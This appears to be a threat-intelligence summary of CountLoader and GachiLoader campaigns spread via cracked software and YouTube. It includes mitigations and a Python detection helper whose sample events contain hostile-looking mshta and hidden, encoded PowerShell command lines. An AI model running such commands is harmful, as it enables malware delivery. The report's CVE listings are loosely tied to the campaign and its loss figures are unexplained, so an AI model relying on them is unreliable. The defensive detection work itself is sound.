Executive Summary
In December 2025, researchers revealed a dual campaign in which cracked software download sites and compromised YouTube videos were used to distribute the CountLoader and GachiLoader malware families. Users seeking pirated software were redirected to malicious downloads delivering CountLoader, a modular loader that enabled persistent access, evasion of antivirus tools and lateral movement, and ultimately delivered infostealer payloads such as ACR Stealer. In parallel, the YouTube Ghost Network used compromised accounts to distribute GachiLoader via fake installer videos, leveraging new techniques for stealth and privilege escalation and dropping secondary threats such as the Rhadamanthys stealer.
These campaigns showcase rising innovation in malware loader design, particularly signed-binary abuse, fileless execution, and the exploitation of popular platforms to reach unwary users. This approach not only increases payload delivery rates but also poses detection challenges for enterprises and individuals alike.
Why This Matters Now
Attackers are increasingly abusing trusted download sources and social channels, leveraging sophisticated loaders with anti-analysis features to bypass detection. The use of modular loaders, novel process injection, and fileless delivery rapidly escalates risk for organizations and individuals, making layered defenses and real-time anomaly detection urgent priorities.
Attack Path Analysis
Attackers initiated compromise via users downloading cracked software and malicious YouTube links, resulting in loader execution on endpoints. Privilege escalation was achieved by attempting to run loaders with elevated privileges and bypassing security tools. Lateral movement occurred as malware propagated through removable drives and executed additional payloads across systems. Command & control was maintained using mshta.exe, PowerShell, and obfuscated URLs to fetch further payloads and instructions. Exfiltration of credentials and sensitive data was performed by info-stealer malware communicating over potentially encrypted or obfuscated channels. The ultimate impact included theft of sensitive information and the potential for broader organizational compromise.
Kill Chain Progression
Initial Compromise
Description
Users were tricked into downloading and executing booby-trapped cracked software installers and malicious links from YouTube, resulting in loader malware execution.
Related CVEs
CVE-2023-23397
CVSS 9.8 – Microsoft Outlook Elevation of Privilege Vulnerability
Affected Products:
Microsoft Outlook – 2013 SP1, 2016, 2019, 2021, Office 365
Exploit Status:
Exploited in the wild
CVE-2023-36884
CVSS 8.8 – Microsoft Office and Windows HTML Remote Code Execution Vulnerability
Affected Products:
Microsoft Office – 2013, 2016, 2019, 2021, Office 365
Microsoft Windows – 10, 11, Server 2016, Server 2019, Server 2022
Exploit Status:
Exploited in the wild
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise Software Supply Chain
Phishing: Spearphishing via Service
User Execution: Malicious File
Command and Scripting Interpreter: PowerShell
System Binary Proxy Execution: Mshta
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Obfuscated Files or Information
Command and Control over Removable Media
Screen Capture
Exfiltration Over C2 Channel
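The Attack Path Analysis and the technique list above name three behaviours that endpoint telemetry can surface: mshta.exe proxying remote content, PowerShell launched with encoded or hidden arguments, and Run-key persistence. The following detection helper is an added example, not code from the report or its cited sources; the event schema, MITRE sub-technique labels and sample events are constructed here, loosely modelled on process-create and registry-set logs.

```python
# Added example (not from the report or its sources): flags the mshta.exe, PowerShell and
# Run-key behaviours named above. Event fields and sample events are constructed.
import re
from dataclasses import dataclass

REMOTE_URI = re.compile(r"\b(?:https?:|javascript:|vbscript:)", re.I)
PS_ENCODED = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)
PS_STEALTH = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads)|Temp|ProgramData)\\", re.I)

@dataclass
class Event:
    kind: str            # "process" (create) or "registry" (value set)
    image: str = ""      # process image path
    cmdline: str = ""    # full command line
    target: str = ""     # registry key path
    details: str = ""    # registry value data (e.g. an autostart path)

def classify(ev: Event) -> list[str]:
    """Return detection labels for one event; an empty list means nothing fired."""
    hits: list[str] = []
    if ev.kind == "process":
        name = ev.image.rsplit("\\", 1)[-1].lower()
        # T1218.005: mshta.exe proxying remote or inline script content
        if name == "mshta.exe" and REMOTE_URI.search(ev.cmdline):
            hits.append("T1218.005 mshta launched with remote/script URI")
        if name in ("powershell.exe", "pwsh.exe"):
            # T1059.001: encoded command, or hidden window paired with a URI
            if PS_ENCODED.search(ev.cmdline):
                hits.append("T1059.001 encoded PowerShell command")
            if PS_STEALTH.search(ev.cmdline) and REMOTE_URI.search(ev.cmdline):
                hits.append("T1059.001 hidden PowerShell fetching remote URI")
    elif ev.kind == "registry" and RUN_KEY.search(ev.target):
        # T1547.001: Run key whose target lives in a user-writable location
        if USER_WRITABLE.search(ev.details):
            hits.append("T1547.001 Run key points at user-writable path")
    return hits

def scan(events: list[Event]) -> dict[int, list[str]]:
    # Map event index -> labels for every event that fired at least one rule
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}

SAMPLE_EVENTS = [  # constructed samples, not captured telemetry
    Event("process", r"C:\Windows\System32\mshta.exe", "mshta.exe https://cdn.example.invalid/update.hta"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -enc QQBCAEMA"),  # base64 of UTF-16LE "ABC"
    Event("registry", target=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows"
          r"\CurrentVersion\Run\Updater", details=r"C:\Users\alice\AppData\Roaming\svc\updater.exe"),
    Event("process", r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Program Files\Vendor\help.hta"),
]
```

The last sample (a local HTA under Program Files) is a negative control: the rules key on remote or script URIs and user-writable autostart targets rather than on the binary name alone.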
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Malicious Software Prevention Mechanisms
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy Implementation
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Art. 9
CISA Zero Trust Maturity Model (ZTMM) 2.0 – Proactive Device-based Threat Detection
Control ID: Pillar: Devices – Threat Protection
NIS2 Directive – Incident Handling and Technical Controls
Control ID: Article 21(2)(d),(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
Infostealer malware targeting cracked software downloads creates severe risk for development environments, potentially compromising source code and intellectual property through CountLoader and GachiLoader infections.
Information Technology/IT
IT infrastructure faces elevated threat from malware loaders exploiting cracked software distribution, requiring enhanced egress security and anomaly detection to prevent data exfiltration and lateral movement.
Financial Services
Information stealers pose critical risk to financial institutions through credential theft and data exfiltration, necessitating zero trust segmentation and encrypted traffic monitoring per compliance requirements.
Health Care / Life Sciences
Healthcare organizations face HIPAA compliance violations from infostealer campaigns targeting software downloads, requiring multicloud visibility and threat detection capabilities to protect patient data integrity.
Sources
- Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware – https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html (Verified)
- GachiLoader Deploys Payloads Using Heavily Obfuscated Node.js JavaScript Malware on Infected Machines – https://cyberpress.org/gachiloader-node-js-javascript-malware/ (Verified)
- CountLoader and GachiLoader Malware Targeting Windows Systems via Cracked Software and YouTube Campaigns – https://www.rescana.com/post/countloader-and-gachiloader-malware-targeting-windows-systems-via-cracked-software-and-youtube-campa (Verified)
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust segmentation, egress filtering, encrypted traffic control, and threat detection could have significantly reduced the spread, data loss, and stealth tactics used in this multi-stage attack. Implementing CNSF controls would confine malware to compromised hosts, disrupt outbound exfiltration, and increase detection of malicious activity across clouds and distributed networks.
Control: Cloud Firewall (ACF)
Mitigation: Web-based malware delivery is blocked or flagged at the network perimeter.
Control: Threat Detection & Anomaly Response
Mitigation: Privilege misuse or anomalous task scheduling is detected and alerted in real time.
Control: Zero Trust Segmentation
Mitigation: Unauthorized lateral east-west network movements are blocked or rapidly detected.
Control: Egress Security & Policy Enforcement
Mitigation: Outbound connections to unknown or malicious C2 infrastructure are denied.
Control: Encrypted Traffic (HPE)
Mitigation: Sensitive data exfiltration is restricted and encrypted sessions are observable for threat analysis.
Suspicious actions across multiple cloud environments are quickly identified and correlated.
Impact at a Glance
Affected Business Functions
- IT Operations
- Data Security
- Compliance
Estimated downtime: 3 days
Estimated loss: $500,000
Potential exposure of sensitive corporate data, including intellectual property and customer information, due to information-stealing malware deployed by CountLoader and GachiLoader.
Recommended Actions
Key Takeaways & Next Steps
- Deploy cloud firewalls with URL filtering and threat intelligence to block known malware sites and delivery vectors.
- Enforce Zero Trust segmentation and microsegmentation to isolate workloads and prevent lateral malware movement.
- Implement rigorous egress filtering and FQDN policy controls to disrupt C2 and exfiltration paths.
- Utilize high-performance encryption with observability to secure sensitive data in transit and reveal covert exfiltration attempts.
- Enable continuous threat detection, anomaly response, and multicloud visibility to detect, alert, and respond to suspicious behaviors rapidly.